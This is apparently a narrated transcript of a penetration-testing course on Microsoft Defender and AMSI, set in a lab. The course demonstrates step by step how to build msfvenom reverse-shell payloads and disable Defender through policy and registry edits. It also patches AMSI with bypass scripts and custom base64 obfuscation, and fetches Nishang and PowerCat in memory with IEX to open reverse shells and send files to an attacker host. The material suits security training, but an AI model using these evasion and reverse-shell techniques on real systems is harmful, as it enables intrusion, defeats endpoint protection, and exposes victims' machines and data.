A cyber attack will often involve an adversary installing some form of malware or malicious tool on one of our workstations or servers and executing it. It may be a backdoor, a password spray tool, or ransomware. In response, vendors have incorporated anti-malware capabilities in their products. These include malware detection in the firewalls on the perimeter of our network, and in the intrusion detection and prevention systems running inside our network. Some of these just check their databases to match known indicators of compromise, while others might be more sophisticated. While network protection is a useful line of defense, we also need to do host-based malware detection to deal with attacks that get past the perimeter controls and run within our network. Host-based malware detection began as third-party signature-based antivirus solutions, and these still exist in an updated form today. Microsoft developed a free anti-spyware program called Microsoft Defender that could be downloaded for Windows XP, and an antivirus solution called Microsoft Security Essentials. These products have merged and are now part of what is a complete suite of Microsoft Defender products. Defender runs in two modes. Firstly, as a real-time monitoring solution, looking for malware being brought into or executed on the Windows platform. And secondly, by scanning for malware in the file system. Defender is supported with the Microsoft Cloud Protection Service, which provides a much more effective malware detection by going beyond just signature-based checks and analyzing relevant data using advanced machine learning and artificial intelligence capabilities. From the release of Windows 10, Windows Defender Antivirus has become increasingly integrated with the operating system. We can access the antivirus capability by opening the Windows Security app and selecting Virus and Threat Protection. And we can see our settings under Manage Settings. The antivirus service runs on Startup by default, and by default runs with real-time scanning of files active. The Windows Anti-Malware Scan interface, AMSI, allows user applications to call system services, which will link to the installed anti-malware product to scan files or memory buffers. On a default Microsoft build, this will be Microsoft's Defender services. But we can install other security products, such as Norton Antivirus, if we'd prefer to use a third-party product instead of using Windows Defender. The AMSI service is used by the Windows Virus and Threat Protection System, which is the user interface to Microsoft Defender. In addition to system monitoring, a number of Microsoft programs call the AMSI scanning service, including PowerShell, JavaScript and Visual Basic, Excel, and Microsoft Exchange Server. We may not always want Defender to be active when we're on a system to do testing. We may want to test in a scenario where an administrator or an adversary has disabled Defender, or we may want to use tools which upset Defender. If we're a system administrator, we can disable it. Before we learn how to disable Defender, let's see it in action. In Kali, we'll create a payload which connects back to us with a shell. We can do this with the MSF Venom tool. And here we're requesting the payload shell reverse TCP, and we're giving our IP address and port 4444 on the Kali system. And we're going to generate an executable called shelly.exe to run on Windows. Okay, now we'll set up a Python web server so that we can download this from Windows. Okay, we're in PowerShell, so let's fetch our payload. wget http 192.168.1.249 8000, and we're going to get shelly.exe, and we'll write it out to the file shelly.exe. And we get the file, and immediately we get a virus and threat protection alert, and our payload is quarantined. If we're a local administrator, we can switch off real-time protection. To do this, we go to Windows Security, Virus and Threat Protection, Manage Settings, and we switch off real-time protection. And we confirm. So let's get our payload again. We run the wget command again, and we get and write out shelly.exe. And this time, we don't get a threat alert immediately. And when we list our directory, we can see that the file's been written. Back in Kali, we can close our Python server, and we can open up a listener on port 4444. And we can execute our Shelly implant. And in Kali, we can see we now have a shell to our Microsoft Windows system. We've been able to establish a connection into our Windows system by turning off real-time protection. However, real-time protection hasn't been permanently switched off, as it will be set back to active on reboot. If we want to remove Defender permanently, we need to do more, and what we do differs depending on which platform we're using. By default, Windows platforms are configured to use cloud protection as an extension of the detection provided by Microsoft Defender's own on-platform database. This not only provides a real-time update set of signatures, but it adds additional analysis capabilities which run in the cloud. Windows Defender Antivirus uses multiple capabilities to detect and stop a wide range of threats and attacker techniques. Many of these capabilities are built into the client. However, when cloud protection is active, Defender will send metadata or the data itself to the Cloud Protection Service for additional analysis. These cloud-based capabilities integrate feeds from multiple sources to detect known threats and to identify and block new threats. The key capabilities built into the Defender client are as follows. Defender's AI subsystem uses predetermined rules, machine learning, and heuristics to identify code and behavior which resembles known threats. AMSI integration enables detection of fileless and in-memory attacks through script scanning. Scanning of process memory exposes malicious behavior that might have used obfuscation during entry to evade detection. The emulation engine unpacks malware and examines how it would behave at runtime. By emulating content execution and checking memory contents at the end of emulation, Defender is able to identify malware, malware packers, and polymorphic malware. Network activities are monitored for indications of malicious activities. The key capabilities used by the Cloud Protection Service are as follows. More advanced AI subsystem based on machine learning, metadata, and behavior analysis. Client AMSI analysis is supported by more extensive cloud analysis. Neural networks are used to examine full file contents for those files the client considers suspicious. Suspicious files are run in a sandbox to detect any malicious activity. And reputation checks are conducted on URLs, emails, and files. In short, Defender is much more than just a signature matching capability. It's a sophisticated anti-malware solution which should not be underestimated when pen testing. We're in Windows 10, and if we want to permanently disable Defender, there's a few things we need to do. The first is to disable anti-tamper. Then we'll configure our policy to not run Defender, and then we'll check whether we have any scheduled tasks. So let's select Windows, Security, Virus and Threat Protection, Manage Settings, and we'll turn real-time protection off, Cloud Delivered Protection, and Anti-Tamper. Okay, and we can close that. Now let's change the policy settings. In the task search bar, we'll enter gpedit, and we'll go to administrative templates, component, Windows components, Windows Defender Antivirus. And we'll select the turn off Windows Defender Antivirus and enable it, apply it, and OK. And we can close this. The final thing we should do is to check whether there's any tasks scheduled for running Defender. To do that, we select Windows, Administrative Tools, Task Scheduler, and check Task Schedule Library, Microsoft Windows, and down the bottom of the list, Windows Defender. And we have some Defender tasks running, but we don't have Windows Defender Scheduled Scan. If Windows Defender Scheduled Scan were here, we could disable that with the Disable button. We'll come back to this again when we look at Windows 11. Okay, now just to make sure that we have successfully disabled Defender, let's reboot. Okay, we're back again now. And now when we go to Windows Security, Virus and Threat Protection, we see that we don't have any active threat protection. Okay, we're in PowerShell and we've got our web server running in Kali. So let's fetch our payload. wget http 192.168.1.249 8000 / shelly.exe, and we'll send that out and store it as shelly.exe. And we get the file, and there's no Windows Defender alerts. We've successfully disabled Windows Defender and can now do our testing. Let's disable Defender in Windows 11 now. We'll start by using the same approach as we did with Windows 10. We'll select Windows Security, Virus and Threat Protection, Manage Settings, turn off Real-Time Protection and confirm, and turn off Tamper Protection. We can close that. Select Windows Tools, Task Scheduler, we'll navigate to Windows, Windows Defender, and in the middle panel select Schedule Scan and disable it. It's now disabled and we can close that. Close the Windows Tools, and we'll select gpedit for the local group policy editor, and we'll select Computer Configuration, Administrative Templates, Windows Components, Microsoft Defender Antivirus, and in the right-hand pane, we'll open the panel for Turn Off Microsoft Defender Antivirus and enable it. Apply it, and OK. And we can close that. It would seem that we've now disabled Defender. However, let's just check that change we've just made. We'll select gpedit again. And again, go to Administrative Templates, Windows Components, Microsoft Defender Antivirus, and check Turn off Defender Antivirus. And it's not configured. It hasn't retained our setting. In order to enforce security, Microsoft has made it really quite difficult to permanently switch off Defender in Windows 11. So to really turn it off, we need to do something different. In the taskbar, we'll enter msconfig, or we could pick it up from Microsoft Tools. And we'll select the Boot tab and select Safe Boot Minimal. Apply that. And then we'll restart. We're now back in Windows in safe mode. And we can now run from the search bar regedit. And in the registry, select HKey local machine, system, current control set, services, and we'll look down for the entry cents, and we can see the start value is 3. So we'll change that to 4, which is disabled. And we'll look for WD boot. Its start value is 0. We'll change that to 4. And the same for WD filter. 4. We'll change WD NIST driver, start setting from 3 to 4, and WD NIST service from 3 to 4. And finally, we'll change WinDefend from 2 to 4. Okay, and we can close that, and again type msconfig, and in the boot section, remove safe boot. Apply that, and restart. Okay, we're back in Windows 11. When we now check Windows Security, Virus and Threat Protection, we find that it's been disabled. And in PowerShell, with the web server already set up in Kali, we can get our payload, and we get HTTP 192.168.1.249.8000 shelly.exe -out file shelly.exe. And we can see that we've stored the file. Okay, we've disabled Defender on Windows 11. We might get the occasional message telling us to turn it back on, but for now we're good. Let's check whether we can download our MSF Venom payload in Windows Server. I'm using Windows 2022, but disabling Defender is the same across the Windows servers. I'll start up PowerShell and type wget http 192.168.1.249.8000/shelly.exe and save that in the file shelly.exe. And we get the file, and we're defeated by Defender. Okay, let's open the Server Manager and select local server, and we can see in the top panel at the right that Microsoft Defender Antivirus real-time protection is on. We'll switch that off. And we can see real-time protection has switched to off. Let's go back to PowerShell and get our shelly.exe payload. And we find we've downloaded it. Okay. Let's reboot and see if this persists after a reboot. Okay, we've done our reboot and we're back in Server Manager, and we can see that real-time protection is still off. We can go further than this and remove Defender completely. We'll open a PowerShell session as administrator, and we'll type uninstall Windows feature Windows Defender. Okay, and we can restart the server again. And now when we return, we see that Microsoft Defender Antivirus is not installed. We've been able to completely uninstall Defender from Windows Server. We can use obfuscation to change the signature of our payload in an attempt to circumvent Defender. While this approach has worked in the past, it's now quite difficult to get past Defender using obfuscation. And even if we do find a way through, it's likely to be short-lived before Defender catches up and blocks it. Let's look at two typical approaches to creating an obfuscated payload: MSF Venom and Phantom Evasion. And we'll look at a simple shell script to see how Defender deals with them. MSF Venom provides a range of options for obfuscating our payloads in an attempt to circumvent antivirus controls. Let's take a look at how effective these are. We'll generate an alternative payload for Windows using the Shikata-Garnai algorithm, and we'll run the obfuscation 17 times. So we run MSF Venom with the Windows Shell Reverse TCP payload, with our Kali host address and port 4444, and we'll use the x86 Shikata-Garnai encoder, and we'll increment the obfuscation 17 times. We'll output a format of exe, and we'll call the output powershell1.exe, our obfuscated shell, number 1. Okay. Let's set up a Python server and go to our Windows 11 system, which has been reset to have Defender active, and let's download our obfuscated shell number 1. wget http 192.168.1.249 8000 powershell1.exe, and we'll output it as powershell1.exe. And Defender detects it. Let's generate another payload, this time using the metamorphic block-based XOR encoder. So the encoder will be x86 block-XOR, and this time we'll increment the obfuscation 25 times. We'll put it out as an exe format and call it powershell2.exe. Okay, and we'll set up our Python server again, and we'll now get powershell2x, powershell2.exe, and Defender found it again. MSF Venom is a well-known and well-used tool for creating shells, and using it even with obfuscation is unlikely to fool an advanced antivirus solution such as Defender. Let's download a tool called Phantom Evasion to generate our payload. Phantom Evasion claims to use obfuscation to generate a payload which can defeat Defender. And we'll git clone https github.com oddcod3 phantomevasion.git. Okay, so we can cd into Phantom Evasion, and we can now run the setup script. Python 3 phantom evasion.py -- setup. Okay, the installation's finished and we can now run the tool. And we do that just by running Python 3 phantomevasion.py. And we'll select Windows modules, and then the reverse TCP stager. We'll press enter to continue, and we'll take the default architecture. And as our L host, we'll put our Kali address 192.168.1.249, and as our port 4444. And we can change some of the obfuscation defaults, maybe 21 and 13, 2, 11. And when we get to the question regarding certificate spoofer, we'll enter no for signing. We'll take the default output as exe format, and the file name, we'll call this shell2.exe. Okay, so we've generated our new shell. We can exit, and let's set up our web server, and we'll attempt to copy in the obfuscated payload shell2.exe. wget http 192.168.1.249 8000 shell2.exe, and we'll output it to shell2.exe. And Defender detects it. So the simple forms of obfuscation for our executable files no longer seem to provide an easy way of defeating Defender. However, we'll come back to obfuscation in the next section when we look at PowerShell scripts. Sometimes we can achieve the testing we need to do without resorting to obfuscation or more sophisticated attacks, because Defender just doesn't detect the payload we use as malicious. An example of this is the simple shell that we can get from the website shown here. I've downloaded this and updated it to include Kali's IP address and port 4444 as the listener. We've got our Python web server running, so let's set up the listener for the reverse shell. We do that with nc -lp 4444. Okay, let's get the script from our Kali system. wget http 192.168.1.249 8000. We've called it mini reverse.ps1, and we'll save that as mini reverse.ps1. Okay, we've got that, and it didn't cause a Defender alert, so let's try to run it. Firstly, however, we'll need to set up our execution policy to enable scripts to execute, which we do with set dash execution policy minus scope current user minus execution policy unrestricted. And we'll confirm that we want to do that. And then we can run it by typing mini-reverse.ps1. And when we check in Kali, we have a reverse shell. The output's a bit messy, but we do have a shell to use. We've seen that manually disabling Defender requires system administrator privileges and may require us to safeboot the target. However, we may be in the position of having gained a user shell with no privileges. We can try to achieve our aims by living off the land, i.e. using just the tools that come with Windows. However, this may not get us the capability that we need, and we may have to download one or more tools. Even with obfuscation, it's likely that they'll be detected. So we need to know how to disable the anti-malware system without having administrative privileges. Before we do this, let's learn a bit more about the AMSI service. We know that Defender uses the AMSI service to do scanning. So let's now see how AMSI actually works. An application or an operating system module will make a call to the AMSI interface. This will either be directly to the Windows provided Win32 API, or via a language-specific library, which will then call the Win32 API. The call will pass an address of the data to be checked to AMSI. Having called the AMSI interface will then make a call to the antivirus service. This would be Defender by default, or an alternative antivirus product if one has been installed in place of Defender. In the case of Defender, the call uses the amsi.dll com layer, which then makes an RPC call to the anti-malware service. There are two key API calls that are used for this: AMSI scan string and AMSI scan buffer. AMSI maintains a database of malicious keywords, URLs, functions, and procedures. It will scan the script to see if it can detect a malware signature, and if so, then AMSI blocks the execution of the script. Let's get hands-on with the AMSI interface by installing the PyAMSI Python library and creating a small Python script as our AMSI-enabled application. PyAMSI uses a dynamic link library called amsiscanner.dll, which calls the Win32 AMSI scan buffer function. Python is available from the Microsoft Store, and we've got it running on our workstation. We'll install PyAMSI by typing in the command shell pip install PyAMSI. Okay, we can now write a file scanner. I've got one prepared called pyamsi.py, and I've got a simple text file called test.txt. Let's take a look at them. You type myamsi.py. To start with, we import the AMSI function as well as the system library. We then check that we're calling the script with the name of a file, and if not, put out a help message. Then we call the scan file method in the AMSI library and print the results. Next, let's see what's in our test file. Type test.txt. And it's just a little bit of poetry. Okay, let's scan it. We do that with Python, myamsi.py, and pass it the file name test.txt. OK, AMSI returns the sample size, the risk level 1, which is no risk, and a message saying no threat detected. Let's check out another file containing the iCar malware test string, which is displayed on the screen. And I've got that stored as icar.txt. So we'll run our test program again with icar.txt. And we get a message saying malware is detected and Microsoft Defender antivirus detected it. Let's run through how the AMSI subsystem starts up in PowerShell. On starting PowerShell, the AMSI DLL has to be loaded and AMSI initialize will be called. This establishes a context which will be used by all subsequent AMSI functions. On entering a PowerShell command or script, PowerShell will call AMSI open session with the context, and it will create a session buffer. Then the AMSI scan string or AMSI scan buffer functions are called with the context and the session buffers, and the scan is executed. A response value of 1 indicates no malware was detected. A response value of 32,768 means that malware was detected. The session is then closed by calling the AMSI close session, at which point the session buffer is released. Let's go to the Windows Administrative Tools and check our currently active services. We can scroll down to the Microsoft Defender antivirus service and right-click and check Properties. And we'll find that it points to the msmpeng.exe file. This is the main antivirus engine which handles the scan requests. If we check dependencies, we find that it requires DCOM and RPC, as we'd expect. We've already seen how we can tell if we have real-time monitoring by using the iCar test string. In addition, we can check what applications are using AMSI by checking the task list. Task list -m AMSI star. Here we see that PowerShell.exe, which we have running, and TaskList.exe both have the AMSI DLL connected. Our objective in this video is to demonstrate how we can bypass the AMSI checks by setting up a reverse shell. Note that we have a web service open in Kali already, and we'll now set up a listener for our reverse shell with nc-lp on port 4444. We didn't have much luck downloading our MSF Venom command line shell. However, we can run a reverse shell from within PowerShell by using the Nishang PowerShell TCP script from the website shown here. I've downloaded this script onto my Kali system, so let's try to download it from there. I've got a PowerShell session open in Windows 11, so we can wget http 192.168.1.249 invoke PowerShell tcp.ps1 -out file invoke PowerShell tcp.ps1. And we get it, but we're stopped by Defender. One of the strategies for defeating Defender is to run scripts in memory and not write them to disk. We can do this with PowerShell scripts by using the IEX command. Let's try this for PowerShell TCP. IEX new object net dot web client download string http 192.168.1.249 8000 invoke PowerShell TCP .ps1, and then we'll run invoke PowerShell TCP minus reverse minus IP address 192.168.1.249 minus port 4444 to connect to our listener. This again is caught, this time by the AMSI integration in PowerShell, which scans all incoming scripts. In order to run this, we need to disable PowerShell's AMSI service. Disabling AMSI is a bit of a cat and mouse game, with patches making AMSI bypass techniques obsolete and new techniques being developed to replace them. There are many AMSI bypass blogs, such as the example shown here, that provide a range of techniques relevant at the time of publishing. The AMSI bypass script shown in this website works well against all the Windows platforms. In this script, we patch the call to AMSI open session to have it return with an invalid argument, which will disable the scan function. I've copied the script into Kali so we can download and run it. And we run this script with IEX, new object, net dot web client dot download string http 192.168.1.249 8000, and this script is called bypass1.ps1, and you'll find that in your exercise files. This runs successfully and we get an answer true. So let's try our reverse shell again. This now doesn't invoke an alert, and when we check in Kali, we find we have a shell. There's another way we can defeat AMSI, this time by causing the AMSI scan buffer call to fail. Let's set up a listener in Kali once again. NC -LP 4444. The second AMSI bypass script shown in this website also works well against all the Windows platforms. In this script, we patch the call to AMSI scan buffer to return with an invalid argument error code. I've copied the script into Kali so we can download it and run it. I'm in a new PowerShell session. Let's try to download our invoke PowerShell script again. And again, we're blocked by Defender. Let's now run our second bypass script. We'll call that bypass 2, and again, that's in your exercise files. And again, that's true. And now we can run our reverse shell. And when we check Kali, we again find we have a shell. Let's see if we can use obfuscation to avoid detection when running an AMSI bypass. We'll set up a listener in Kali once again, NC -LP 4444. Matt Graber has provided a couple of short reflection methods to bypass AMSI. Let's use his second method, which we have in the file bypass3.ps1. cat bypass3.ps1. Okay, we'll run this now. we'll use our IEX command to do an in-memory execution of bypass3.ps1. And we're caught in the act by Defender. It appears that Matt Graeber's second script is now detected by the AMSI module in PowerShell. If we search for an obfuscation for this bypass, we find one in the AMSI bypass gist in GitHub, as shown here. This is a one-liner based on the now obsolete bypass. And I've copied this into a file called bypass3a.ps1. cat bypass3a.ps1. We can see that the obfuscation takes place by defining some of the strings as variables and expanding them at runtime. Okay, let's try it. And we'll use our IEX memory execution of our bypass3a PowerShell script. And once again, we're caught in the act by Defender. In fact, pretty much as these obfuscations go public, they're picked up by Defender. Okay, so let's get serious and see how we go with a bit of obfuscation of our own. Let's take the string system.management.automation. And encode that in base 64 using our online base 64 encoder. Okay, we'll copy this to the clipboard, and we'll now edit our script to use base 64 rather than a readable string, and expand this also. Let's take a look at what we've got prepared in cat bypass3b.ps1. And we can see that we've added a line at the start which does a decode into $C of our base 64 string, and then uses that in the next line. Let's try this. And again, we'll execute in memory our bypass3b.ps1 script. This time, it doesn't throw a Defender alert. Let's try running our simple shell. Let's try running our PowerShell TCP script. And again, we don't get an alert. And when we're checking Kali, we find that we now have a shell. Okay, we've learned a couple of ways here that we can obfuscate our PowerShell code to make sure that we can generate new AMSI bypass scripts that won't be detected. Now that we can bypass AMSI, we'll want to have a set of tools we can use from PowerShell. One of the useful tools is PowerCat, a netcat for PowerShell. I've got this script on my Kali system, so let's try it out. We'll set up a listener again, nc-lp 4444, and we'll run our initial AMSI bypass script to disrupt the AMSI open session function, which we have in bypass1.ps1. This runs successfully, so now let's run PowerCat. IEX, new object net.web client, download string http 192.168.1.249 8000 / powercat.ps1, and then we'll run PowerCat -c 192.168.1.249 as our listening IP address, -p4444 as our listening port, and we're going to expose command. Okay, and in our Kali system, we can see that we've now got the command shell. Just as with netcat, we can use PowerCat to transfer files. Let's set up our listener again, but this time we'll save the output to a file. NC -LP 4444, and we'll save that to test.cat. We're in our Windows system and we have a test.txt file which we can send. If we type test.txt, we can see its contents. Okay, let's now send that. If we're not already bypassed, we can bypass AMSI again. Okay, we're true. And we'll now run our powercat command, but this time, instead of opening a command shell, we'll do -i./test.txt. Okay, rather than wait for that to time out, we'll cancel that, and we'll go to our Kali system and have a look at our test.cat, and we can see that we've transferred the contents of the file. In this course, you've learned about the way in which Defender works, and how by leveraging the anti-malware scan interface, other tools such as PowerShell can protect against malicious scripts. We may want to remove Defender, and in this course you've learned how to do that. We may also want to leave Defender active but disable AMSI, and you've learned a couple of techniques for doing that also. However, there are many techniques developed for AMSI bypass, and most are by now obsolete. You've seen how we can use obfuscation to try to defeat Defender, but the best way to keep on top of AMSI is to stay current with changes to bypass techniques through ongoing learning. I'd like to invite you to go to my LinkedIn Learning page and check out my other security courses. You'll find a number of cybersecurity courses on my page, covering a wide range of topics